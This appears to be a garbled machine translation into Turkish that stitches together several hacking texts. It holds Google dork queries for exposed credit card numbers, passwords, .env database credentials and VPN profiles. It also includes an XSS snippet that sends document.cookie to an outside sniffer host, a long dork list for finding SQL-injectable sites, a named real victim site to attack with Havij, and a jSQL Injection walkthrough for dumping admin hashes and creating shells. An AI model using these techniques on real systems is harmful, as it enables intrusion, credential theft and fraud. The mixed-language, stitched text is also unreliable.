Dış görünüm operatörü için, daha büyük bir kısa ada sahip sürüm iyileştirildi (hepsi ön eki olmadan). Fark, allinurl'un kelimelerin anlamını bilmesi ve inurl'in sadece ilki olması gerçeğinde yatmaktadır. Aksi takdirde, talepten gelen bu rahatsız edici sözler web sayfalarında kesin olarak yayınlanabilir. inurl operatörü de site - site için benzer bir operatöre benziyor. İlki ayrıca, belgeye gönderilen sembol dizisinin (örneğin, /cgi-bin/) farklı farklılıklara sahip bileşenleri aramak için yaygın olarak kullanılıp kullanılmadığını bilmenizi sağlar.

Pratik olarak deneyelim. Allintext filtresini alıyoruz ve bu şekilde çalışıyoruz, kredi kartlarının sayı ve dönüşüm kodlarını gördükten sonra, vadeleri iki yıldan az bir sürede bitecek (aksi takdirde, tüm kredileri sığdıracak kadar akıllılarsa).

Allintext: kart numarası son kullanma tarihi /2017 cvv

Genç bir bilgisayar korsanının Pentagon veya NASA'nın "sunucularına saldırdığı", gizli bilgilerde yalan söylediği haberlerini okursanız, Google'ı kullanmanın bu kadar temel bir tekniği hakkında kendi başınıza gitmek daha iyidir. Diyelim ki elimizde NASA casuslarının bir listesi ve iletişim bilgileri var. Elbette böyle bir benzerlik elektronik ortamdadır. Açıklık veya gözetim için, organizasyonun tam sitesinde şaraplar da bulunabilir. Bu vesileyle, Victoria'nın iç bölgelerine randevular için şarap parçaları göndermenin olmayacağı mantıklıdır. Böyle bir dosyada hangi kelimeler olabilir? Asgari olarak - "adres" alanı. Perevіriti, en basit şekilde tüm pripuschenna'dır.

inurl:nasa.gov dosya türü:xlsx "adres"

Koristuesya bürokrasisi

Benzer bilgi - bir resepsiyonist. Adil bir şekilde, sağlam bir yakalama, web barındırıcıları için Google operatörleri, Merezhya'nın kendisi ve shukany yapısının özellikleri hakkında daha ayrıntılı bilgi sağlar. Ayrıntıları bilerek, ihtiyacınız olan dosyaların yetkisini kolayca filtreleyebilir ve netleştirebilir, böylece verilerin gerçek değerini ortadan kaldırabilirsiniz. Bürokrasinin burada kurtarmaya gelmesi komik. Merezh'e sızan gizli mesajları sinsice fısıldadığınız tipik formüller üretmek için çıktı.

Örneğin, ABD Savunma Bakanlığı'nın ofisindeki obov'yazkovy damgası Dağıtım beyanı, belgenin genişliğinin standartlaştırılmış değişimi anlamına gelir. A harfi, gizli hiçbir şeyi olmayan halka açık yayınları temsil eder; B - işaretleri iç victoria'dan daha azdır, C - yalnızca F'ye kadar kesinlikle gizlidir. Daha büyük bir eşitliğin egemenliğinin kurulması için özellikle önemli olan X harfini kullanmakta bir sakınca yoktur. Servis dili üzerinde çalışması gerekenler için bu tür belgeler şaka olsun, biz de C harfi ile dosyaları karıştıralım. DoDI 5230.24 direktifini temel alır, bu tür işaretlemeler, eleştirel olarak tanımlamak için kullanılabilecek belgelere atanır. ihracat kontrolüne tabi olan önemli teknolojiler. Bu kadar dikkatli bir şekilde korunan bilgilerin, ABD Ordusu için görülen üst düzey.mil alanındaki sitelerde olabileceğini ortaya çıkarın.

"DAĞITIM BEYANI C" inurl:navy.mil

.mil alanında, ABD Savunma Bakanlığı ve diğer sözleşmeli kuruluşlardan başka site olmaması daha uygundur. Poshukov'un vidach s obmezhennyam'ı alan adına tamamen temiz çıktı ve başlıklar - kendileri için. Rus sırlarının rütbesine benzer Shukati, pratik olarak marnodur: etki alanında.

Siteden .mil alanındaki herhangi bir belgeyi saygıyla kontrol ederseniz, talebi netleştirmek için başka işaretler kullanabilirsiniz. Örneğin, teknik bilgileri manuel olarak da arayabileceğiniz ihracat borsasına “Sec 2751” gönderilir. Bazen resmi sitelerden uzaklaşırsınız, ancak bir kez aydınlandığında, bir tür arayışı içinde, cіkavim mesajlarına gidemeyenlere, Google'ın önbelleğine (önbellek operatörü) veya İnternet Arşivi sitesine acele edin.

Karanlıktan uzaklaşıyoruz

Krіm vipadkovo, devlet dairelerinin belgelerinin gizliliğini kaldırdı, Google'ın önbelleğinde bir saat boyunca Dropbox ve diğer veri toplama hizmetlerinden gelen özel dosyalardaki mesajları, halka açık olarak yayınlanan veriler üzerinde "özel" mesajlar oluşturuyormuş gibi birleştirdi. Alternatif ve bağımsız hizmetlerle daha da iyiler. Örneğin, bir sonraki adım, yönlendiricide yüklü bir FTP sunucusuna sahip tüm Verizon istemcilerinin verilerini bilmektir.

allinurl:ftp://verizon.net

Aynı anda kırk binden fazla bilge adam vardı ve 2015 baharında daha da fazlası vardı. Verizon.net vekili, başka herhangi bir sağlayıcının adını önerebilir ve kim bilinecekse, daha büyük bir yakalama elde edebilirler. FTP sunucusu aracılığıyla, yönlendiriciye bağlı harici depolama aygıtındaki dosyaları görebilirsiniz. Uzaktan çalışma, kişisel kasvet veya eşler arası dosya indiricisi olarak tse NAS'ı arayın. Bu burunların tamamı Google ve diğer arama sistemleri tarafından indekslenir, bu nedenle harici disklere kaydedilen dosyalara doğrudan istek ile erişim yapılabilir.

Yapılandırmalara bakmak

Karanlığa toptan geçişten önce, shovishch kadar uzak, tutarsızlıkların da olduğu basit FTP sunucuları el üstünde tutuldu. Bazıları alakalı ve dosі. Örneğin, popüler WS_FTP Professional programında yapılandırma, kayıt türü ve parolalarla ilgili veriler ws_ftp.ini dosyasından kaydedilir. Bilmek ve okumak kolaydır, tüm kayıtlar metin biçiminde kaydedilir ve parolalar, minimum karışıklıktan sonra Üçlü DES algoritması kullanılarak şifrelenir. Daha büyük sürümler için ilk baytı kaldırmanız yeterlidir.

Bu tür parolaların şifresini çözmek, WS_FTP Password Decryptor yardımcı programı veya ücretsiz bir web hizmeti yardımıyla kolaydır.

Sitenin kötülüğünden bahsetmişken, CMS yapılandırma dosyalarının veya elektronik ticaret eklentilerinin günlüklerinden ve yedeklerinden şifrenin kaldırılmasını isteyin. Tipik yapıyı biliyorsanız, anahtar kelimeleri kolayca girebilirsiniz. ws_ftp.ini'ye benzer satırlar daha geniştir. Örneğin, Drupal ve PrestaShop'un dile özgü bir tanımlayıcısı (UID) ve geçerli bir parolası (pwd) vardır ve tüm bilgiler extensions.inc uzantılı dosyalardan toplanır. Shukati їх şu şekilde yapılabilir:

"pwd=" "UID=" dahili:inc

DBMS'de şifrelerin kilidini açın

SQL sunucularının konfigürasyon dosyalarında e-postaların isimleri ve adresleri seçilen formatta saklanır ve şifreler MD5 hash'lerinde yazılır. Onları kesinlikle görünüşte, imkansız bir şekilde deşifre edin, koruyucu, karma parolanın orta çiftlerinin geçerliliğini bilebilir.

Bu saate kadar DBMS'ler şifrelenmekte ve bazı dillerde şifre hash işlemi yapılmamaktadır. Herhangi birinin yapılandırma dosyaları tarayıcıda kolayca incelenebilir.

Metin:DB_PASSWORD dosya türü:env

Windows sunucularındaki görünümle, yapılandırma dosyalarının konumu genellikle kayıt defteri tarafından işgal edilir. Yoga gіlkah'daki Shukati, bir dosya türü olarak aynı sırada, vikoristovuyuchi reg olabilir. Örneğin, eksen:

Dosya türü:reg HKEY_CURRENT_USER "Parola"=

bariz hakkında unutma

Kapalı bilgilere erişimi olan bazı kişiler, Google'ın şafağı alanında harcadıkları ek vipadkovo vіdkritikh verilerini aramaya başlar. İdeal seçenek, bazı genişletilmiş formatlardaki parolaların listesini bilmektir. Bir metin dosyasından, Word belgelerinden veya Excel elektronik tablolarından eğik kayıtlardan veri kaydetme işlemi yalnızca en seçkin kişiler tarafından yapılabilir, ancak bunları her zaman kullanabilirsiniz.

Dosya türü:xls inurl:şifre

Bir taraftan, benzer olayların yok edilmesi için çok sayıda koshtiv var. htaccess, CMS yamalama, sol komut dosyalarını hackleme ve diğer dirkileri kıvırma için yeterli erişim haklarını sağlamak gerekir. Ayrıca, yeni bir dosya ve dizinlerde arama motoru tarayıcılarına endekslenen robots.txt dosyasındaki hataların listesini içeren bir dosya kullanıyorum. Öte yandan, benim sunucumdaki robots.txt'in yapısı standart gibi göründüğünden, yenisinde bazı hileler olduğu hemen ortaya çıkıyor.

Herhangi bir sitedeki dizinlerin ve dosyaların listesi, standart dizini ile sunulur. Servis amaçlı parçalar başlığa dahil olmaktan suçludur, o zaman intitle operatörü tarafından bir kuşatma її araması vardır. Sözcükler /admin/, /personal/, /etc/ dizinlerinde bulunur ve /secret/'de gezinin.

Güncellemeler tarafından takip edildi

Buradaki alaka düzeyi çok önemlidir: eski tutarsızlıklar düzgün bir şekilde azaltılmıştır, ancak Google ve o yogo Poshukov'un vidach'ı sürekli değişmektedir. Başka bir deyişle, "kalan saniyede" (&tbs=qdr:s, örneğin istek URL'si) ve "gerçek zamanlı" (&tbs=qdr:1) filtresi arasında gezinin.

Google dosyasında kalan güncellemenin tarihi için zaman aralığı da dolaylı olarak belirtilir. Grafik web arayüzü aracılığıyla tipik dönemlerden (yıl, gün, gün vb.) birini seçebilir veya bir tarih aralığı belirleyebilirsiniz, aksi takdirde bu yöntem otomasyon için uygun değildir.

Adres satırına bakarak, &tbs=qdr: ek yapısından sonuç almanın yolu hakkında yalnızca tahminde bulunulabilir. Ondan sonraki y harfi bir kerelik bir limit belirlemelidir (&tbs=qdr:y), m ayın geri kalanı için sonuçları, w - hafta için, d - son gün için, h - geri kalanı için sonuçları gösterir. yıl, n - kış için ve s - bana bir saniye ver. Google'ın aşina olduğu en son sonuçlar, ek filtre &tbs=qdr:1 ile tanınır.

Google'da tarih aralığının tarih aralığı operatörü aracılığıyla Jülyen biçiminde ayarlandığını biliyorsanız, zor bir komut dosyası yazmanız gerekir. Örneğin, bu şekilde 1 tarihten 1 gün 2015'e kadar gizli kelimesini içeren PDF belgelerinin listesini öğrenebilirsiniz.

Gizli dosya türü:pdf tarih aralığı:2457024-2457205

Aralık, kesirli kısım düzeltilmeden Jülyen tarih formatında belirtilir. Onları Gregoryen takviminden elle çevirmeden elle çevirin. Bir tarih dönüştürücü kullanmak daha kolaydır.

Tekrar hedefleme ve filtreleme

Krіm vkazіvki dodatkovykh operіvі, poshkovomu їх їх, doğrudan tіlі silaannya'da nadsilati mümkündür. Örneğin, filetype:pdf açıklaması as_filetype=pdf yapısını içerir. Böyle bir sıralamada, açıklığa kavuşturulsun, hafifçe koyun. Yalnızca Honduras Cumhuriyeti'nden elde edilen sonuçlara göre, arama motoru URL yapısını cr=countryHN ve hatta Bobruisk şehrinden - gcs=Bobruisk'in eklenmesine izin verilir. Tam listeyi bayilerde bulabilirsiniz.

Google tıklamalarını otomatikleştirmenin maliyeti hayatı kolaylaştırır, ancak çoğu zaman sorunları da beraberinde getirir. Örneğin, WHOIS aracılığıyla koristuvach'ın IP'si aynı yere atanır. Google'a bilgi gönderiminde, sunucular arasındaki kibir sadece dengelenmekle kalmaz, aynı zamanda arama sonuçlarının sonuçları da değişir. Aynı istekle, ilk tarafta farklı sonuçları çarçur etmek bölge için iyidir ve bazıları çıkmaza girebilir. Shukati bilgilerinin gl=country yönergesinden sonra dvolіterny kodu olduğu kozmopolitinin farkında olun. Örneğin, Hollanda'nın kodu NL'dir ve Google'daki Vatikan ve Pivnichny Kore kodlarını koymamıştır.

Çoğu zaman, Poshukov'un vidach'ı, eklenen filtrelerin muzaffer sayısından sonra vurulmuş gibi görünüyor. Böyle bir vipadka ile, yenisine bir kapatma anahtarı ekleyerek su kaynağını netleştirmek kolaydır (cildin önüne bir eksi konur). Örneğin, Kişisel kelimesiyle, bankacılık, öğretici adını alır. Bunun için, saf arama sonuçları bir ders kitabı incelemesi değil, açıklamalar gösterecektir:

Intitle:"/Kişisel/ Dizini" -adlar -eğitici -bankacılık

geri kalanı için popo

Bilgi korsanı, ihtiyacı olan her şeyle kendi başına ilgilenmesinden sorumludur. Örneğin, bir VPN kullanışlı bir şeydir, ancak pahalıdır, aksi takdirde timchasova ve s obezhennyami'dir. Yalnızca kendiniz için abone olmak görünmez. Güzel, grup abonelikleri nedir ve Google'ın yardımıyla bir grubun parçası olmak çok kolay. Cisco VPN yapılandırma dosyasına kimin erişeceği, standart olmayan PCF uzantısına ve vіdomiy slyakh'a kimin erişeceği: Program Files \ Cisco Systems \ VPN Client \ Profiles . Bir istek ve örneğin Bonn Üniversitesi'nin dost canlısı ekibine katılırsınız.

Dosya türü:pcf vpn VEYA Grup

BİLGİ

Şifreler şifrelenmiş görünümden kaydedilir, ancak Maurice Massard şifresini çözmek için zaten bir program yazmıştır ve thecampusgeeks.com aracılığıyla ücretsizdir.

Yüzlerce farklı türde saldırı ve sızma testi Google'ın yardımını bekliyor. Popüler programlar, veritabanlarının ana biçimleri, PHP'nin sayısal tutarsızlığı, cehennem vb. Fısıldayanları doğru bir şekilde ortaya çıkarmak için gerekli bilgileri istemek gerekir (özellikle çirkin hamamlar üzerinde çalışmayı planlamadıkları için). Fikirlerle yaşayan tek Shodan değil, aynı zamanda merezhevyh kaynaklarını indekslemek için bir üs olun!

Bilgi güvenliği ile ilgili birkaç kelime yazdım. Makale, programcılar-yeni başlayanlar ve Frontend-rozrobkoy'a yeni katılmaya başlayanlar için geçerli olacaktır. Sorun nedir?

Pek çok perakendeci-pochatkivtsiv, yazılı kod konusunda o kadar telaşlı ki, robotlarının güvenliğini unutuyorlar. Ve daha da aptalca olanı - SQL, XXS sormak gibi tutarsızlıkları unutun. Ayrıca yönetim panelleri için kolay şifreler oluştururlar ve kaba kuvvete tabidirler. Onlara ne tür saldırılar yapabilirsiniz?

SQL enjeksiyonu

SQL enjeksiyonu, belirli bir DBMS için SQL sorgusu sırasında meydana gelen, veritabanına yapılan en yaygın saldırı türüdür. Birçok insan bu tür saldırılardan muzdarip ve harika şirketler kuruyor. Bunun nedeni, perakendecinin veri veritabanını ve SQL sorgularını yazma saati için affıdır.

SQL sorgularında bulunan girdi verilerinin yanlış işlenmesi yoluyla SQL engelleme türüne yönelik bir saldırı mümkündür. Bir bilgisayar korsanından uzak bir saldırı ile yalnızca birkaç veritabanını değil, aynı zamanda parolaları ve yönetim paneli günlüklerini de harcama riskiniz vardır. Ve bu veriler yeterli olacak, böylece siteyi geri yükleyeceğim veya yenisinde tartışılmaz düzeltmeler yapacağım.

Saldırı PHP, ASP, Perl ve diğer dillerde yazılmış komut dosyalarında başarıyla uygulanabilir. Bu tür saldırıların başarısının, DBMS'nin nasıl yenildiğine ve betiğin kendisinin nasıl uygulandığına bağlı olması daha olasıdır. Dünyada SQL-іn'єktsіy için birçok farklı site var. Chiomu ile geçiş yapmak kolaydır. "Yolları" tanıtmak yeterlidir - farklı siteler için arama istemek için bu özel istekler. Onlardan hareket ekseni:

• inurl:index.php?id=
• inurl:trainers.php?id=
• inurl:buy.php?kategori=
• inurl:article.php?ID=
• inurl:play_old.php?id=
• inurl:declaration_more.php?decl_id=
• inurl:sayfa kimliği=
• inurl:games.php?id=
• inurl:page.php?file=
• inurl:newsDetail.php?id=
• inurl:gallery.php?id=
• inurl:article.php?id=

Onlar hakkında yaygara nasıl yapılır? Bunları Google arama sistemine veya Yandex'e girmeniz yeterlidir. Poshukovik sadece tutarsız bir site değil, diğer yandan aynı tutarsızlıkta görebilirsiniz. Alemy, chomu zupinyatisya ve perekonayemosya'da olmayacağız, gerçeğin scho tarafı çileden çıkıyor. Hangi "id=1" değeri yeterliyse, tek bir ayak "'" koyun. Şöyle:

• inurl:games.php?id=1'

І site SQL sorgusu hakkında bir af görüyoruz. Bilgisayar korsanımızın neye ihtiyacı vardı?

Ve ona bir af ile tarafa bir mektup gönderme ihtiyacını verdi. İlk bölümden yardımcı programları ile "Kali linux" dağıtım kitindeki ortamın tutarsızlığı üzerinde çalışalım: öğretici kodun uygulanması ve gerekli işlemlerin uygulanması. Nasıl olacak, sana söyleyemem. Ama internette bununla ilgili bilgi bulabilirsiniz.

XSS Saldırısı

Bu saldırı türü çerezleri etkiler. Їх, kendi kalbinizde, koristuvach'ları kurtarmayı ve kurtarmayı sevin. Neden? Onlarsız ne olacak? Aje Zavdyaki Çerezleri Vk.com ve Mail.ru'dan parolanın yüz katını sürmüyoruz. Ve onlar tarafından yönlendirilen küçük sessizdir. Ancak internette, bilgisayar korsanları için genellikle bir kural vardır: başarı oranı, güvenlik faktörü ile doğru orantılıdır.

Bir XSS saldırısı uygulamak için bilgisayar korsanımızın JavaScript'i bilmesi gerekir. Mova, bilgisayarın kaynaklarına erişemeyenler için ilk bakışta oldukça basittir ve shkidliva değildir. Pratsyuvati z JavaScript korsanı yalnızca tarayıcıda, fazlasıyla yeterli olabilir. Aje smut kodu web tarafına girin.

Saldırı süreciyle ilgili ayrıntılara girmeyeceğim. Rozpovim, hissinin temelinden nasıl göründüğünden daha azdır.

Hacker, foruma veya ziyaretçi defterine JS kodu ekleyebilir:

Komut dosyaları bizi, kodun alınacağı virüslü tarafa yönlendirecektir: ister koklayıcı, ister koleksiyon veya istismar olsun, aksi takdirde Çerezlerimizi önbellekten çalacak.

Neden JavaScript'in kendisi? Çünkü JavaScript web istekleriyle iyi çalışır ve Çerezlere erişebilir. Ama eğer senaryomuz bizi bir tür siteye aktaracaksa, o zaman hatırlaması kolay. Hemen, hacker zastosovuє kurnaz seçeneği - sadece resimdeki kodu girin.

Img=newImage();

Img.src=” http://192.168.1.7/sniff.php?”+document.cookie;

Biz sadece senaryomuzun adresi olarak size atfedilen bir resim oluşturuyoruz.

Kendinizi neyden nasıl kurtarabilirsiniz? Daha da basit - şüpheli mesajlara gitmeyin.

DoS ve DDos Saldırıları

DoS (İngilizce Hizmet Reddi'nden - Vіdmova v oblugovuvannі) - vіdmovi'ye її getirmek için bir yöntemle hesaplama sistemine bir hacker saldırısı. Bu tür zihinlerin yaratılması, bir tür özetleyici sistem sistemleri için, umulduğu gibi sistem kaynaklarına (sunuculara) erişim sağlayamaz, ancak erişim zordur. Vіdmova sistemleri її zakhoplennya, yakscho için rastgele bir durumda olabilir PZ kritik bilgilerin olup olmadığını görür: örneğin, sürüm, program kodunun bir parçası ve іn. Ancak ekonomik baskı dünyasının en iyi yanı: Gelir getiren basit bir hizmetin maliyeti. Sağlayıcıdan Rakhunki veya saldırının girişinde içeri girerseniz, bağırsağın "ölçüsünü" açıkça görebilirsiniz. Bu saatte, DoS ve DDoS saldırıları en popüler olanlarıdır, çünkü yasal olarak önemli bir kanıt bırakmadan tüm sistemi uygulamaya koymanıza izin verir.

DoS'u DDos saldırılarından farklı kılan nedir?

DoS saldırısı, makul bir şekilde istendi. Örneğin, sunucu giriş paketlerinin doğruluğunu kontrol etmezse, bir bilgisayar korsanı sonsuza kadar işlenecek böyle bir istek oluşturabilir ve diğer zadnannyami ile çalışmak için işlemci saatini kullanmaz. Açıkçası, müşteriler hizmetle ilgilenir. Ale perevantazhit, harika sitelerin gitmemesi için böyle bir yolla uyum sağlamak için. Yerde çok çeşitli kanallara ve yüksek basınçlı sunuculara sahipler, bu nedenle bu tür kaymalarla sorunsuz bir şekilde başa çıkabilirler.

DDoS, aslında DoS ile aynı saldırıdır. DoS'ta bir paket istenmesine rağmen, DDoS'ta yüzlerce veya daha fazla paket olabilir. Navit navitzhnі sunucusu ve bu tür girişimlerin önüne geçemez. Sana bir örnek vereceğim.

DoS saldırısı - bir rozmovu z kimosunu yönetiyorsanız, ancak daha sonra bir kişi prangasız gibi gelir ve yüksek sesle bağırmaya başlarsınız. Kiminle hareket etmek imkansız ya da daha karmaşık. Karar: alınan kişiye güvence vermek için koruma çağrısı. DDoS saldırıları - eğer NATO'da bu kadar binlerce hain insan varsa. Böyle bir ruh halinde, koruma bükülebilir ve kaybolabilir.

DoS ve DDoS, zombi denilen bilgisayarlardan üretilir. Tse korsanları, coristuvach'ların bilgisayarlarını hacklediler, bu yüzden makinelerinin böyle bir sunucunun saldırısına katıldığından şüphelenmediler.

Kendinizi gerçek bir tsgogodan nasıl kurtarırsınız? Mümkün değil. Ale, bir bilgisayar korsanının işini kolaylaştırabilirsin. Kimler için sabit sunucularla iyi bir barındırma seçmek gerekir.

kaba kuvvet saldırısı

Rozrobnik, saldırı saldırıları için birçok sisteme bakabilir, bizim tarafımızdan yazılan komut dosyalarını daha sık inceleyebilir, sitede tutarsızlık olup olmadığını kontrol edebilir. Ve site düzeninin geri kalanına gidiyorsanız ve admin paneline sadece bir şifre koyarsanız, bir kelimeyi unutabilirsiniz. Parola!

Basit bir şifre belirlemeniz kesinlikle önerilmez. 12345, 1114457, vasya111 vb. kullanabilirsiniz.10-11 karakterden az şifre belirlemeniz önerilmez. Aksi takdirde, en yaygın ve beceriksiz saldırı olan Brute Force'u tanıyabilirsiniz.

Kaba kuvvet, çeşitli özel programlardan bir sözlük için bir parolaya yapılan kaba kuvvet saldırısıdır. Sözlükler farklı olabilir: Latin alfabesi, sayılar için kaba, diyelim ki belirli bir aralığa kadar, değiştirin (Latin + rakamlar) ve sözlüklerde benzersiz sembollerle gezinin @#4$%&*~~`”\ ? ki.

Açıkçası, bu tür bir saldırıyı ortadan kaldırmak kolaydır. Dosit vigadati katlanabilir şifre. Captcha ile kandırılabilirsiniz. Ayrıca, siteniz CMS'de bozulduysa, çoğu benzer saldırı türünü sayar ve IP'yi engeller. Unutulmamalıdır ki şifrede daha farklı semboller vardır, yogo seçmekten daha önemlidir.

Bilgisayar korsanları nasıl pratik yapılır? Çoğu zaman ya şüphelenirler ya da parolanın bir kısmını öğrenmek için çok geç olur. Koristuvach şifresinin kesinlikle 3 veya 5 karaktere katlanmadığını varsaymak daha da mantıklıdır. Bu tür parolalar kısmi kötülüklere indirgenebilir. Temel olarak, bilgisayar korsanları 5 ila 10 karakter aralığını alır ve önceden bilmeleri için buna birkaç karakter ekler. Dali, gerekli aralıklardan şifreler üretir. Kali linux'un dağıtımı, bu tür değişiklikler için programlara sahiptir. Ve işte, saldırı, sözlüğün zaten o kadar büyük olmadığı gerçeğine göre, artık trivatime uzun değil. O zamana kadar, bir bilgisayar korsanı video kartının sertliğini zadіyati edebilir. Deyakі їх, CUDA sistemini destekler ve onların en kaba kaba kuvveti 10 kata kadar artar. І axis mi bachimo, bu kadar basit bir şekilde yapılan bir saldırı tamamen gerçektir. Yaş kaba kuvvet sadece sitelere tabi değildir.

Sevgili perakendeciler, bilgi güvenliği sistemini unutmayın, bugün bile bu tür saldırılar karşısında çok az insan, zocrema ve güçler zarar görüyor. Aja en büyük çekişme bir erkektir, kural olarak, burada olabilirsiniz veya burada göremezsiniz. Biz programcıyız ama programlanmış makineler değiliz. Bilgi kaybı ciddi sonuçlarla tehdit etse bile tetikte olun!

Ve böylece, bugün size herhangi bir özel bilgi olmaksızın kötü olanlardan bahsedeceğim. Sana söyleyeceğim, bu yeterli değil, ama hepsi aynı.
Başlangıç ​​için, sitelerin kendilerini tanımanız gerekir. Kimin için google.com'a gidin ve yol boyunca yürüyün

Inurl:pageid= inurl:games.php?id=inurl:page.php?file=inurl:newsDetail.php?id=inurl:gallery.php?id=inurl:article.php?id=inurl:show.php? id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray- Sorular-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl: news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl: select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem. php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php? id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= ben nurl:participant.php?id=inurl:download.php?id=inurl:main.php?id=inurl:review.php?id=inurl:chappies.php?id=inurl:read.php?id= inurl : prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view . php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php? id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl :downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl :product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:ürün detayı .php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= url:theme'de. php?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transkript. php?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2. php?option= inurl:readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql. php?id= inurl:aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4? id= inurl:announce.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl: bak.php? ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl: teklif.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:".php?id=1" inurl:".php?cat=1" inurl:".php?catid= 1" inurl:".php?num=1" inurl:".php?bid=1" inurl:".php?pid=1" inurl:".php?nid=1"

eksen küçük bir listedir. Kendiniz için kefil olabilirsiniz. Otzhe, siteyi biliyorduk. Örneğin http://www.vestitambov.ru/
Bu programı indirelim

**Gizli İçerik: İçerik içeriği için gönderi sayımız 3 veya daha fazla olmalıdır.**

Tamam. Sonra kurbanın sitesini yerleştiririz.
Tisnemo'nun başlangıcı. Dali sonuçları kontrol et.
Yani program SQL farkını biliyordu.

Dalі Havij'i indirin, http://www.vestitambov.ru:80/index.php?module=group_programs&id_gp= otrimane posilannya tudi'yi ekleyin. Havij'i nasıl selamlayacağınızı açıklayın ve de indirmem, yoga bilmek önemli değil. Bıyık. İhtiyacınız olan verileri aldınız - yöneticinin şifresi ve sağda, bu sizin hayal gücünüz.

not İlk yazma denemem. Neyin var gibi çığlık atıyorum

Dosyayı üzerine tıklayarak çalıştırın (bir sanal makine gerektirir).

3. Siteyi SQL-іn'єktsії üzerinde yeniden kontrol etmek için bir saatlik anonimlik

Kali Linux'ta Tor ve Privoxy Kurulumu

[Perakendecide dağıtılır]

Windows'ta Tor ve Privoxy Kurulumu

[Perakendecide dağıtılır]

jSQL Injection'da proxy'ler aracılığıyla robotlar kurma

[Perakendecide dağıtılır]

4. Siteyi SQL-іn'єktsії z jSQL Injection'da yeniden kontrol etme

Programla çalışmak daha da basittir. Site adresini girip ENTER tuşuna basmanız yeterlidir.

Sonraki ekran görüntüsünde, sitenin en fazla üç tür SQL enfeksiyonu olduğunu görebilirsiniz (bunlarla ilgili bilgiler sağ alt köşede gösterilir). Enjeksiyonun adına tıklayarak fitilleme yöntemini değiştirebilirsiniz:

Ayrıca, veri tabanı zaten bize gösterildi.

Dış görünüm tablosuna bakabilirsiniz:

Tablolarda yöneticinin adlarını seslendirin.

Şanslıysanız ve yöneticinin verilerini biliyorsanız, o zaman çok erken. Yöneticiyi, verilerin nereye girileceğini bilmek de gereklidir.

5. jSQL Injection ile Arama Yöneticisi

Kimin için bir sonraki sekmeye gidin. Burada bize olası bir adres söylendi. Revizyon için bir veya daha fazla taraf seçebilirsiniz:

Başka programları kazanmasına gerek olmayanların başarısı.

Yazık, zavallı programcılar, yak çok zengin olmayan açık fikirli bir kişiden şifreleri kaydedin. Parolanın bir satırında sık sık dosit

8743b52063cd84097a65d1633f5c74f5

Tse karma. Yogo'nun şifresi kaba kuvvetle çözülebilir. І… jSQL Enjeksiyonu kaba kuvvetle yapılabilir.

6. Bruteforcing, jSQL Injection'ın yardımının arkasındaki hash'leri

Kuşkusuz akıllı, diğer programları kullanmak için gerekli olmayanlardır. İşte en popüler karmalardan birkaçı.

En iyi seçenek değil. Hash'leri deşifre etmede guru olmak için Rus dili tarafından tavsiye edilir.

Ancak, açıkçası, başka bir program yoksa veya eğitim için zaman yoksa, tanıtılan kaba kuvvet işleviyle jSQL Enjeksiyonu daha çocukça olacaktır.

Іsnuyu ayarları: hangi karakterleri ayarlayabilir ve şifreyi, şifre aralığını girebilirsiniz.

7. SQL-enfeksiyonları tespit edildikten sonra dosyalarla yapılan işlemler

Veritabanlarıyla suç operasyonları - okuma ve değiştirme, SQL enfeksiyonu durumunda, saldırgan dosya operasyonlarının üstesinden gelmek mümkündür:

• sunucudaki dosyaları okuma
• Sunucudaki yeni dosyaların canlılığı
• sunucuda kabuk canlılığı

Her şey jSQL Injection ile uygulanmaktadır!

Є değiş tokuş - SQL sunucusunun dosya ayrıcalıkları olabilir. Akıllı sistem yöneticileri pis kokuyu açtı ve dosya sistemine erişim mümkün değil.

Dosya ayrıcalıklarının varlığı kolayca yanlış anlaşılabilir. Sekmelerden birine gidin (dosyaları okuyun, bir kabuk oluşturun, yeni bir dosya açın) ve belirlenen işlemlerden birini deneyin.

